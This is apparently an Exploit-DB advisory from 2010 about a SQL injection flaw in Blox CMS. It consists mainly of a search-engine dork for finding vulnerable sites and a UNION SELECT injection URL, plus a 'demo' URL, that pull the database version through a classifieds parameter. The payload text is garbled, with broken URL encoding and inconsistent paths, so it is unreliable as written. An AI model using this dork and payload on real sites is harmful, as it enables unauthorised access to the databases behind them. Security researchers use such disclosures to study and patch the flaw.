# Title: BloxCMSSQLInjectionVulnerability # EDB-ID: 12729 # CVE-ID :() # OSVDB-ID :() # Author: CoBRa_21 # Published: 2010-05-24 # Verified: yes # DownloadExploitCode # DownloadNA -------------
Blox cms SQL Injection VuLnErability
# Title: blox cms SQL Injection Vulnerability
# EDB-ID: 12729
# CVE-ID :()
# OSVDB-ID :()
# Author: CoBRa_21
# PublishEd: 2010-05-24
# Verified: yes
# Download Exploit Code
# Download N/
Bytes -------------------------------------------------------------------------------------------
Blox cms SQL Injection Vulnerability
Bytes -------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://bloxcms.com/
Dork: Powered by Blox CMS from TownNews.com
Bytes -------------------------------------------------------------------------------------------
SQL Injection:
Http: // localhost/[path]/app/classifieds/rentaLs/? C =-156% 20 union % 20 select % 28%, 2, 3, 4, version %, 7, 8, 9, 10, 11, 12, 13, 14, 15
Demo:
Http: // localhost/app/classifieds/schemals /? C =-156% 20 union % 20 select % 28%, 2, 3, 4, version %, 7, 8, 9, 10, 11, 12, 13, 14, 15